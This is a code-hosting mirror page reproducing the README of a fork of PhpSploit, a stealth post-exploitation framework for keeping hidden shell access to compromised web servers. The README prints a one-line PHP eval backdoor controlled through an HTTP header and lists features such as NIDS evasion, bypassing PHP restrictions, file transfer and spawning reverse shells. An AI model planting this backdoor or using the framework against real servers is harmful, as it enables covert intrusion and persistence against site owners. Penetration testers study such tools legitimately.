Coder Social home page Coder Social logo

rijinrij / phpsploit Goto Github PK

View Code? Open in Web Editor NEW

This project forked from nil0x42/phpsploit

0.0 0.0 0.0 3.02 MB

Stealth post-exploitation framework

Home Page: https://github.com/nil0x42/phpsploit

License: GNU General Public License v3.0

Python 75.84% PHP 10.60% Shell 13.39% C 0.16%

phpsploit's Introduction

PhpSploit: Furtive post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

travis build codacy code quality lgtm alerts codecov coverage codeclimate maintainability license requires.io requirements

phpsploit demo


Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

  • Efficient: More than 20 plugins to automate post-exploitation tasks

    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids

    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features

    • Detailed help for any command or option (type help)
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported platforms (as target):

  • GNU/Linux
  • BSD Like
  • Mac OS X
  • Windows NT

Contributors

Thanks goes to these people (emoji key):

nil0x42
nil0x42

๐Ÿ’ป ๐Ÿš‡ ๐Ÿ”Œ โš ๏ธ
shiney-wh
shiney-wh

๐Ÿ’ป ๐Ÿ”Œ
Wannes Rombouts
Wannes Rombouts

๐Ÿ’ป ๐Ÿšง
Amine Ben Asker
Amine Ben Asker

๐Ÿ’ป ๐Ÿšง
jose nazario
jose nazario

๐Ÿ“– ๐Ÿ›
Sujit Ghosal
Sujit Ghosal

๐Ÿ“
Zerdoumi
Zerdoumi

๐Ÿ›
tristandostaler
tristandostaler

๐Ÿ›
Rohan Tarai
Rohan Tarai

๐Ÿ›

This project follows the all-contributors specification. Contributions of any kind welcome!

phpsploit's People

Contributors

nil0x42 avatar requires avatar allcontributors[bot] avatar shiney-wh avatar wapiflapi avatar yurilaaziz avatar pyup-bot avatar paralax avatar imgbotapp avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.